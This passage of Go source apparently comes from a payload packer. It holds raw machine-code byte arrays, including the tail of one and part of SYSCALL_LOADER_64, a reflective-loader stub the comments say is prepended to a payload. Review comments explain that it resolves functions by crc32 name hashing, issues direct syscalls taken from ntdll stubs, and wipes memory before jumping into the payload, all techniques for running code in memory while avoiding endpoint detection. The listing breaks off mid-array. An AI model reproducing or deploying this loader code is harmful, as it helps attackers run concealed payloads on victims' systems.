220 | 0x96, 0x06, 0x00, 0x00, 0x83, 0xc4, 0x04, 0xff, 0xd0, 0x83, 0xec, 0x18,
221 | 0x89, 0xc2, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85, 0xd2, 0x78, 0x5c, 0x8b,
222 | 0x47, 0x54, 0x89, 0x44, 0x24, 0x08, 0x89, 0x6c, 0x24, 0x04, 0x8b, 0x44,
223 | 0x24, 0x2c, 0x89, 0x04, 0x24, 0xe8, 0x05, 0xff, 0xff, 0xff, 0x0f, 0xb7,
224 | 0x47, 0x14, 0x8d, 0x5c, 0x07, 0x18, 0x66, 0x83, 0x7f, 0x06, 0x00, 0x74,
225 | 0x32, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x43, 0x0c, 0x03, 0x44, 0x24,
226 | 0x2c, 0x89, 0xea, 0x03, 0x53, 0x14, 0x8b, 0x4b, 0x10, 0x89, 0x4c, 0x24,
227 | 0x08, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0xd2, 0xfe, 0xff,
228 | 0xff, 0x83, 0xc6, 0x01, 0x83, 0xc3, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x39,
229 | 0xf0, 0x7f, 0xd3, 0x8b, 0x44, 0x24, 0x2c, 0x83, 0xc4, 0x3c, 0x5b, 0x5e,
230 | 0x5f, 0x5d, 0xc3, 0x57, 0x53, 0x81, 0xec, 0x34, 0x02, 0x00, 0x00, 0x8b,
231 | 0x9c, 0x24, 0x40, 0x02, 0x00, 0x00, 0xc7, 0x84, 0x24, 0x2c, 0x02, 0x00,
232 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x7c, 0x24, 0x1c, 0xb9, 0x82, 0x00,
233 | 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf3, 0xab, 0x80, 0x3b, 0x00,
234 | 0x0f, 0x84, 0x98, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x89,
235 | 0xd0, 0x83, 0xc2, 0x01, 0x80, 0x3c, 0x13, 0x00, 0x75, 0xf5, 0x01, 0xd2,
236 | 0x66, 0x89, 0x94, 0x24, 0x24, 0x02, 0x00, 0x00, 0x83, 0xc2, 0x02, 0x66,
237 | 0x89, 0x94, 0x24, 0x26, 0x02, 0x00, 0x00, 0x8d, 0x54, 0x24, 0x1c, 0x89,
238 | 0x94, 0x24, 0x28, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x78, 0x12, 0x66, 0x0f,
239 | 0xbe, 0x14, 0x03, 0x66, 0x89, 0x54, 0x44, 0x1c, 0x83, 0xe8, 0x01, 0x83,
240 | 0xf8, 0xff, 0x75, 0xee, 0x8d, 0x84, 0x24, 0x2c, 0x02, 0x00, 0x00, 0x89,
241 | 0x44, 0x24, 0x0c, 0x8d, 0x84, 0x24, 0x24, 0x02, 0x00, 0x00, 0x89, 0x44,
242 | 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04,
243 | 0x24, 0x00, 0x00, 0x00, 0x00, 0x68, 0xa4, 0xb9, 0xeb, 0xb4, 0xe8, 0x77,
244 | 0x05, 0x00, 0x00, 0x83, 0xc4, 0x04, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x85,
245 | 0xc0, 0x78, 0x10, 0x8b, 0x84, 0x24, 0x2c, 0x02, 0x00, 0x00, 0x81, 0xc4,
246 | 0x34, 0x02, 0x00, 0x00, 0x5b, 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00,
247 | 0xeb, 0xf0, 0x66, 0xc7, 0x84, 0x24, 0x24, 0x02, 0x00, 0x00, 0x00, 0x00,
248 | 0x66, 0xc7, 0x84, 0x24, 0x26, 0x02, 0x00, 0x00, 0x02, 0x00, 0x8d, 0x44,
249 | 0x24, 0x1c, 0x89, 0x84, 0x24, 0x28, 0x02, 0x00, 0x00, 0xeb, 0x8d, 0x55,
250 | 0x57, 0x56, 0x53, 0x8b, 0x6c, 0x24, 0x14, 0x89, 0xeb, 0x03, 0x5d, 0x3c,
251 | 0x8b, 0x93, 0xa0, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85,
252 | 0xd2, 0x74, 0x62, 0x01, 0xea, 0x89, 0xee, 0x2b, 0x73, 0x34, 0x83, 0x3a,
253 | 0x00, 0x75, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x4f, 0x0f, 0xb7,
254 | 0x08, 0x81, 0xe1, 0xff, 0x0f, 0x00, 0x00, 0x03, 0x0a, 0x01, 0x74, 0x0d,
255 | 0x00, 0x83, 0xc0, 0x02, 0x89, 0xd1, 0x03, 0x4a, 0x04, 0x39, 0xc8, 0x74,
256 | 0x18, 0x0f, 0xb6, 0x48, 0x01, 0x89, 0xcf, 0x83, 0xe7, 0xf0, 0x89, 0xfb,
257 | 0x80, 0xfb, 0x30, 0x74, 0xd5, 0x80, 0xf9, 0x0f, 0x76, 0xdf, 0xcc, 0xeb,
258 | 0xdc, 0x89, 0xc2, 0x83, 0x3a, 0x00, 0x74, 0x10, 0x8d, 0x42, 0x08, 0x89,
259 | 0xd1, 0x03, 0x4a, 0x04, 0x39, 0xc8, 0x75, 0xd5, 0x89, 0xca, 0xeb, 0xeb,
260 | 0xb8, 0x01, 0x00, 0x00, 0x00, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x57,
261 | 0x56, 0x53, 0x83, 0xec, 0x2c, 0x8b, 0x6c, 0x24, 0x40, 0x8b, 0x45, 0x3c,
262 | 0x8b, 0x94, 0x05, 0x80, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00,
263 | 0x85, 0xd2, 0x0f, 0x84, 0xb4, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x15, 0x00,
264 | 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x40, 0x0c, 0x85, 0xc0, 0x75, 0x74, 0xb8,
265 | 0x01, 0x00, 0x00, 0x00, 0xe9, 0x9b, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
266 | 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x3c, 0x24,
267 | 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x02, 0x89, 0x06, 0x83,
268 | 0xc3, 0x04, 0x83, 0xc6, 0x04, 0x8b, 0x03, 0x85, 0xc0, 0x74, 0x34, 0x85,
269 | 0xc0, 0x78, 0xd6, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d,
270 | 0x44, 0x05, 0x02, 0x89, 0x04, 0x24, 0xe8, 0xe8, 0xfc, 0xff, 0xff, 0xc7,
271 | 0x44, 0x24, 0x08, 0xff, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x89,
272 | 0x3c, 0x24, 0xe8, 0x51, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0xc4, 0x89,
273 | 0x06, 0xeb, 0xc0, 0x83, 0x44, 0x24, 0x1c, 0x14, 0x8b, 0x44, 0x24, 0x1c,
274 | 0x8b, 0x40, 0x0c, 0x85, 0xc0, 0x74, 0x25, 0x01, 0xe8, 0x89, 0x04, 0x24,
275 | 0xe8, 0xe2, 0xfd, 0xff, 0xff, 0x89, 0xc7, 0x85, 0xc0, 0x74, 0x1c, 0x8b,
276 | 0x44, 0x24, 0x1c, 0x89, 0xeb, 0x03, 0x18, 0x89, 0xee, 0x03, 0x70, 0x10,
277 | 0x8b, 0x03, 0x85, 0xc0, 0x75, 0x99, 0xeb, 0xcb, 0xb8, 0x01, 0x00, 0x00,
278 | 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x83, 0xc4, 0x2c, 0x5b,
279 | 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x83, 0xe4,
280 | 0xf0, 0x81, 0xec, 0x40, 0x02, 0x00, 0x00, 0x8b, 0x5d, 0x08, 0x89, 0xd8,
281 | 0x03, 0x43, 0x3c, 0x89, 0xda, 0x03, 0x50, 0x78, 0x8b, 0x40, 0x7c, 0x89,
282 | 0x44, 0x24, 0x1c, 0x8b, 0x7a, 0x20, 0x8b, 0x42, 0x1c, 0x89, 0x44, 0x24,
283 | 0x2c, 0x8b, 0x42, 0x24, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x4a, 0x18, 0x85,
284 | 0xc9, 0x0f, 0x84, 0x6b, 0x01, 0x00, 0x00, 0xbe, 0x00, 0x00, 0x00, 0x00,
285 | 0x01, 0xdf, 0x89, 0x54, 0x24, 0x24, 0x89, 0x4c, 0x24, 0x20, 0xc7, 0x44,
286 | 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0xd8, 0x03, 0x04, 0xb7, 0x89,
287 | 0x04, 0x24, 0xe8, 0x20, 0xfc, 0xff, 0xff, 0x39, 0x75, 0x10, 0x74, 0x1a,
288 | 0x3b, 0x45, 0x0c, 0x74, 0x15, 0x83, 0xc6, 0x01, 0x8b, 0x44, 0x24, 0x20,
289 | 0x39, 0xc6, 0x75, 0xd6, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0a, 0x01,
290 | 0x00, 0x00, 0x8b, 0x54, 0x24, 0x24, 0x8d, 0x04, 0x73, 0x8b, 0x4c, 0x24,
291 | 0x28, 0x0f, 0xb7, 0x04, 0x08, 0x8d, 0x04, 0x83, 0x8b, 0x4c, 0x24, 0x2c,
292 | 0x03, 0x1c, 0x08, 0x39, 0xd3, 0x0f, 0x82, 0xe7, 0x00, 0x00, 0x00, 0x8b,
293 | 0x44, 0x24, 0x1c, 0x01, 0xc2, 0x39, 0xd3, 0x0f, 0x83, 0xd9, 0x00, 0x00,
294 | 0x00, 0xc5, 0xf9, 0xef, 0xc0, 0xc5, 0xfa, 0x7f, 0x44, 0x24, 0x38, 0x8d,
295 | 0x7c, 0x24, 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x3d, 0x00, 0x00,
296 | 0x00, 0xf3, 0xab, 0xc5, 0xfa, 0x7f, 0x84, 0x24, 0x3c, 0x01, 0x00, 0x00,
297 | 0x8d, 0xbc, 0x24, 0x4c, 0x01, 0x00, 0x00, 0xb9, 0x3d, 0x00, 0x00, 0x00,
298 | 0xf3, 0xab, 0x80, 0x3b, 0x2e, 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0xbe,
299 | 0x00, 0x00, 0x00, 0x00, 0x83, 0xc6, 0x01, 0x89, 0xf0, 0x80, 0x3c, 0x33,
300 | 0x2e, 0x75, 0xf5, 0x8d, 0x54, 0x24, 0x38, 0x89, 0x44, 0x24, 0x08, 0x89,
301 | 0x5c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0x5c, 0xfb, 0xff, 0xff, 0x8d,
302 | 0x4c, 0x33, 0x01, 0x80, 0x39, 0x00, 0x0f, 0x84, 0x87, 0x00, 0x00, 0x00,
303 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x01, 0xde, 0x83, 0xc0, 0x01, 0x89, 0xc2,
304 | 0x80, 0x7c, 0x06, 0x01, 0x00, 0x75, 0xf4, 0x8d, 0x84, 0x24, 0x3c, 0x01,
305 | 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x04,
306 | 0x24, 0xe8, 0x25, 0xfb, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x38, 0x89, 0x04,
307 | 0x24, 0xe8, 0x61, 0xfc, 0xff, 0xff, 0x89, 0xc3, 0xb8, 0x00, 0x00, 0x00,
308 | 0x00, 0x85, 0xdb, 0x74, 0x2f, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
309 | 0x00, 0x8d, 0x84, 0x24, 0x3c, 0x01, 0x00, 0x00, 0x89, 0x04, 0x24, 0xe8,
310 | 0x0f, 0xfb, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0xff, 0xff, 0xff, 0xff,
311 | 0x89, 0x44, 0x24, 0x04, 0x89, 0x1c, 0x24, 0xe8, 0x78, 0xfe, 0xff, 0xff,
312 | 0x89, 0xc3, 0x89, 0xd8, 0x8d, 0x65, 0xf4, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3,
313 | 0xbe, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x58,
314 | 0xff, 0xff, 0xff, 0xba, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x85, 0xb8, 0x00,
315 | 0x00, 0x00, 0x00, 0xeb, 0xdb, 0x57, 0x56, 0x53, 0x83, 0xec, 0x08, 0x8b,
316 | 0x7c, 0x24, 0x18, 0x64, 0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c,
317 | 0x8d, 0x70, 0x14, 0x8b, 0x58, 0x14, 0x39, 0xde, 0x74, 0x2e, 0x0f, 0xb7,
318 | 0x43, 0x24, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x43, 0x28, 0x89, 0x04, 0x24,
319 | 0xe8, 0xa2, 0xfa, 0xff, 0xff, 0x39, 0xf8, 0x74, 0x0d, 0x8b, 0x1b, 0x39,
320 | 0xde, 0x75, 0xe3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x03, 0x8b, 0x43,
321 | 0x10, 0x83, 0xc4, 0x08, 0x5b, 0x5e, 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00,
322 | 0x00, 0xeb, 0xf2, 0x55, 0x57, 0x56, 0x53, 0x83, 0xec, 0x4c, 0x8b, 0x6c,
323 | 0x24, 0x60, 0x89, 0xef, 0x03, 0x7d, 0x3c, 0x0f, 0xb7, 0x47, 0x14, 0x8d,
324 | 0x5c, 0x07, 0x18, 0xc7, 0x44, 0x24, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x66,
325 | 0x83, 0x7f, 0x06, 0x00, 0x74, 0x31, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x89,
326 | 0xfd, 0xe9, 0x0c, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x24, 0x2f, 0x01, 0xeb,
327 | 0x41, 0xba, 0x20, 0x00, 0x00, 0x00, 0xe9, 0x8e, 0x00, 0x00, 0x00, 0xb8,
328 | 0x00, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x83,
329 | 0xc4, 0x4c, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0xb8, 0x01, 0x00, 0x00, 0x00,
330 | 0xeb, 0xf1, 0x89, 0xc7, 0xc1, 0xef, 0x1f, 0xc6, 0x44, 0x24, 0x2f, 0x00,
331 | 0xa9, 0x00, 0x00, 0x00, 0x20, 0x74, 0x3a, 0xba, 0x10, 0x00, 0x00, 0x00,
332 | 0x89, 0xf9, 0x84, 0xc9, 0x74, 0x34, 0x25, 0x00, 0x00, 0x00, 0x60, 0xbf,
333 | 0x01, 0x00, 0x00, 0x00, 0x3d, 0x00, 0x00, 0x00, 0x60, 0xba, 0x20, 0x00,
334 | 0x00, 0x00, 0xb8, 0x80, 0x00, 0x00, 0x00, 0x0f, 0x45, 0xd0, 0xeb, 0x26,
335 | 0xa9, 0x00, 0x00, 0x00, 0x20, 0x75, 0x93, 0xc6, 0x44, 0x24, 0x2f, 0x01,
336 | 0xba, 0x04, 0x00, 0x00, 0x00, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x25, 0x00,
337 | 0x00, 0x00, 0x60, 0x3d, 0x00, 0x00, 0x00, 0x60, 0x0f, 0x84, 0x7b, 0xff,
338 | 0xff, 0xff, 0x80, 0x7c, 0x24, 0x2f, 0x00, 0x74, 0x0c, 0x89, 0xf8, 0x84,
339 | 0xc0, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x0f, 0x45, 0xd0, 0x8b, 0x44, 0x24,
340 | 0x60, 0x8b, 0x4c, 0x24, 0x28, 0x03, 0x41, 0x0c, 0x89, 0x44, 0x24, 0x3c,
341 | 0x8b, 0x41, 0x10, 0x89, 0x44, 0x24, 0x34, 0xc7, 0x44, 0x24, 0x38, 0x00,
342 | 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x38, 0x89, 0x44, 0x24, 0x10, 0x89,
343 | 0x54, 0x24, 0x0c, 0x8d, 0x44, 0x24, 0x34, 0x89, 0x44, 0x24, 0x08, 0x8d,
344 | 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
345 | 0xff, 0xff, 0x68, 0x41, 0x4d, 0xde, 0x6e, 0xe8, 0xb2, 0x00, 0x00, 0x00,
346 | 0x83, 0xc4, 0x04, 0xff, 0xd0, 0x83, 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x88,
347 | 0x17, 0xff, 0xff, 0xff, 0x83, 0xc6, 0x01, 0x83, 0xc3, 0x28, 0x0f, 0xb7,
348 | 0x45, 0x06, 0x39, 0xf0, 0x0f, 0x8e, 0x0c, 0xff, 0xff, 0xff, 0x89, 0x5c,
349 | 0x24, 0x28, 0x8b, 0x43, 0x24, 0x85, 0xc0, 0x74, 0xe3, 0x99, 0x83, 0xe2,
350 | 0xc8, 0x83, 0xc2, 0x40, 0xa9, 0x00, 0x00, 0x00, 0x40, 0x0f, 0x84, 0x03,
351 | 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x35, 0xff, 0xff, 0xff, 0xbf,
352 | 0x00, 0x00, 0x00, 0x00, 0xc6, 0x44, 0x24, 0x2f, 0x01, 0xba, 0x02, 0x00,
353 | 0x00, 0x00, 0xe9, 0xf1, 0xfe, 0xff, 0xff, 0x56, 0x53, 0x83, 0xec, 0x14,
354 | 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x46, 0x3c, 0x8b, 0x94, 0x06, 0xc0, 0x00,
355 | 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85, 0xd2, 0x74, 0x0d, 0x8b,
356 | 0x5c, 0x16, 0x0c, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x75, 0x21,
357 | 0x83, 0xc4, 0x14, 0x5b, 0x5e, 0xc3, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
358 | 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x34,
359 | 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0xc3, 0x04, 0x8b, 0x03, 0x85,
360 | 0xc0, 0x75, 0xdf, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0xd2, 0x60, 0x89,
361 | 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
362 | 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c,
363 | 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0xe2, 0xf2,
364 | 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78,
365 | 0xe3, 0x42, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49,
366 | 0x18, 0xe3, 0x34, 0x8b, 0x7d, 0xf8, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6,
367 | 0xac, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0x38, 0xe0, 0x75, 0xf6, 0x3b, 0x7d,
368 | 0x24, 0x75, 0xe6, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c,
369 | 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89,
370 | 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0xc3, 0x5f, 0x5f, 0x5a, 0x8b, 0x12,
371 | 0xeb, 0x93, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x59, 0x29, 0xf1, 0x83, 0xc1,
372 | 0x0d, 0x89, 0xf7, 0x83, 0xef, 0x05, 0xf3, 0xaa, 0xfc, 0x89, 0xec, 0x5d,
373 | 0xff, 0xe0,
374 | }
375 |
// SYSCALL_LOADER_64 is the position-independent x64 reflective-loader stub
// that the packer prepends to the payload, presumably assembled from
// loader/syscall-loader-x64/syscall-loader-x64.asm (see build.sh there).
// Treat it as generated output: regenerate it from the .asm and diff rather
// than editing bytes here, since every byte changes what runs in the target.
//
// NOTE(review): observations from decoding the bytes below, not from the
// assembly source — confirm against the .asm before relying on them:
//   - the f2 [44] 0f 38 f0 opcode pattern (SSE4.2 crc32) is used to hash
//     names, so a CPU without SSE4.2 would fault (#UD) during resolution;
//   - a "49 89 ca 0f 05 c3" sequence (mov r10, rcx; syscall; ret) and a
//     scan for the "4c 8b d1 b8" / "0f 05 c3" bytes of an ntdll syscall stub
//     suggest the loader extracts service numbers and issues direct
//     syscalls, which is what the "syscall" variant name implies;
//   - it ends with a "rep stosb" (f3 aa) followed by "jmp rax" (ff e0), i.e.
//     it appears to wipe memory before transferring control, so the pages it
//     runs from must remain writable.
var SYSCALL_LOADER_64 = []byte{
	0x5e, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0xf1, 0xe8, 0x97, 0x00, 0x00,
	0x00, 0x48, 0x89, 0xc7, 0x48, 0x89, 0xf9, 0xe8, 0xe5, 0x02, 0x00, 0x00,
	0x48, 0x89, 0xf9, 0xe8, 0x4c, 0x02, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8,
	0xf8, 0x05, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa7, 0x07, 0x00, 0x00,
	0x48, 0x31, 0xc0, 0x8b, 0x47, 0x3c, 0x8b, 0x44, 0x07, 0x28, 0x48, 0x01,
	0xf8, 0xe9, 0x08, 0x09, 0x00, 0x00, 0x56, 0x57, 0x48, 0x89, 0xcf, 0x48,
	0x89, 0xd6, 0x4c, 0x89, 0xc1, 0xf3, 0xa4, 0x5f, 0x5e, 0xc3, 0x66, 0x85,
	0xd2, 0x74, 0x24, 0x49, 0x89, 0xc8, 0x0f, 0xb7, 0xd2, 0x8d, 0x42, 0xff,
	0x48, 0x8d, 0x54, 0x01, 0x01, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x41,
	0x0f, 0x38, 0xf0, 0x00, 0x49, 0x83, 0xc0, 0x01, 0x49, 0x39, 0xd0, 0x75,
	0xf1, 0xeb, 0x21, 0x0f, 0xb6, 0x11, 0x84, 0xd2, 0x74, 0x1b, 0x48, 0x83,
	0xc1, 0x01, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x0f, 0x38, 0xf0, 0xc2,
	0x48, 0x83, 0xc1, 0x01, 0x0f, 0xb6, 0x51, 0xff, 0x84, 0xd2, 0x75, 0xef,
	0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf8, 0x55, 0x57, 0x56, 0x53,
	0x48, 0x83, 0xec, 0x48, 0x48, 0x89, 0xcd, 0x48, 0x63, 0x79, 0x3c, 0x48,
	0x01, 0xcf, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x81, 0x3f, 0x50, 0x45, 0x00,
	0x00, 0x0f, 0x85, 0xa7, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38,
	0x00, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x50, 0x48, 0x89, 0x44, 0x24, 0x30,
	0x48, 0x8d, 0x54, 0x24, 0x38, 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00,
	0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x10, 0x00, 0x4c, 0x8d, 0x4c,
	0x24, 0x30, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc1, 0xff,
	0xff, 0xff, 0xff, 0x41, 0xba, 0x55, 0x7c, 0xce, 0x99, 0xe8, 0x27, 0x07,
	0x00, 0x00, 0x49, 0x89, 0xc2, 0xe8, 0xd9, 0x07, 0x00, 0x00, 0x89, 0xc2,
	0xb8, 0x00, 0x00, 0x00, 0x00, 0x85, 0xd2, 0x78, 0x51, 0x44, 0x8b, 0x47,
	0x54, 0x48, 0x89, 0xea, 0x48, 0x8b, 0x4c, 0x24, 0x38, 0xe8, 0x14, 0xff,
	0xff, 0xff, 0x0f, 0xb7, 0x47, 0x14, 0x48, 0x8d, 0x5c, 0x07, 0x18, 0x66,
	0x83, 0x7f, 0x06, 0x00, 0x74, 0x2b, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x8b,
	0x4b, 0x0c, 0x48, 0x03, 0x4c, 0x24, 0x38, 0x8b, 0x53, 0x14, 0x48, 0x01,
	0xea, 0x44, 0x8b, 0x43, 0x10, 0xe8, 0xe8, 0xfe, 0xff, 0xff, 0x83, 0xc6,
	0x01, 0x48, 0x83, 0xc3, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x39, 0xf0, 0x7f,
	0xda, 0x48, 0x8b, 0x44, 0x24, 0x38, 0x48, 0x83, 0xc4, 0x48, 0x5b, 0x5e,
	0x5f, 0x5d, 0xc3, 0x57, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x49,
	0x89, 0xc8, 0x48, 0xc7, 0x84, 0x24, 0x48, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0xc7, 0x84, 0x24, 0x34, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x48, 0x8d, 0x7c, 0x24, 0x20, 0xb9, 0x41, 0x00, 0x00, 0x00, 0xb8,
	0x00, 0x00, 0x00, 0x00, 0xf3, 0x48, 0xab, 0x41, 0x80, 0x38, 0x00, 0x0f,
	0x84, 0x94, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89,
	0xd0, 0x48, 0x83, 0xc2, 0x01, 0x41, 0x80, 0x7c, 0x10, 0xff, 0x00, 0x75,
	0xf1, 0x8d, 0x14, 0x00, 0x66, 0x89, 0x94, 0x24, 0x30, 0x02, 0x00, 0x00,
	0x83, 0xc2, 0x02, 0x66, 0x89, 0x94, 0x24, 0x32, 0x02, 0x00, 0x00, 0x48,
	0x8d, 0x54, 0x24, 0x20, 0x48, 0x89, 0x94, 0x24, 0x38, 0x02, 0x00, 0x00,
	0x83, 0xe8, 0x01, 0x78, 0x15, 0x48, 0x98, 0x66, 0x41, 0x0f, 0xbe, 0x14,
	0x00, 0x66, 0x89, 0x54, 0x44, 0x20, 0x48, 0x83, 0xe8, 0x01, 0x85, 0xc0,
	0x79, 0xed, 0x4c, 0x8d, 0x8c, 0x24, 0x48, 0x02, 0x00, 0x00, 0x4c, 0x8d,
	0x84, 0x24, 0x30, 0x02, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9,
	0x00, 0x00, 0x00, 0x00, 0x41, 0xba, 0xa4, 0xb9, 0xeb, 0xb4, 0xe8, 0x06,
	0x06, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x78, 0x11, 0x48, 0x8b, 0x84,
	0x24, 0x48, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x50, 0x02, 0x00, 0x00,
	0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf0, 0x66, 0xc7, 0x84,
	0x24, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x84, 0x24, 0x32,
	0x02, 0x00, 0x00, 0x02, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x89,
	0x84, 0x24, 0x38, 0x02, 0x00, 0x00, 0xeb, 0x9a, 0x49, 0x89, 0xc9, 0x48,
	0x63, 0x51, 0x3c, 0x48, 0x01, 0xca, 0x8b, 0x82, 0xb0, 0x00, 0x00, 0x00,
	0xb9, 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x75, 0x89, 0xc0, 0x49,
	0x8d, 0x0c, 0x01, 0x4d, 0x89, 0xca, 0x4c, 0x2b, 0x52, 0x30, 0x83, 0x39,
	0x00, 0x75, 0x4a, 0xb9, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x5c, 0x8b, 0x11,
	0x44, 0x0f, 0xb7, 0x00, 0x41, 0x81, 0xe0, 0xff, 0x0f, 0x00, 0x00, 0x4c,
	0x01, 0xc2, 0x4d, 0x01, 0x14, 0x11, 0x48, 0x83, 0xc0, 0x02, 0x8b, 0x51,
	0x04, 0x48, 0x01, 0xca, 0x48, 0x39, 0xd0, 0x74, 0x18, 0x0f, 0xb6, 0x50,
	0x01, 0x41, 0x89, 0xd0, 0x41, 0x83, 0xe0, 0xf0, 0x41, 0x80, 0xf8, 0xa0,
	0x74, 0xcc, 0x80, 0xfa, 0x0f, 0x76, 0xdb, 0xeb, 0xd9, 0x48, 0x89, 0xc1,
	0x83, 0x39, 0x00, 0x74, 0x14, 0x48, 0x8d, 0x41, 0x08, 0x8b, 0x51, 0x04,
	0x48, 0x01, 0xca, 0x48, 0x39, 0xd0, 0x75, 0xd1, 0x48, 0x89, 0xd1, 0xeb,
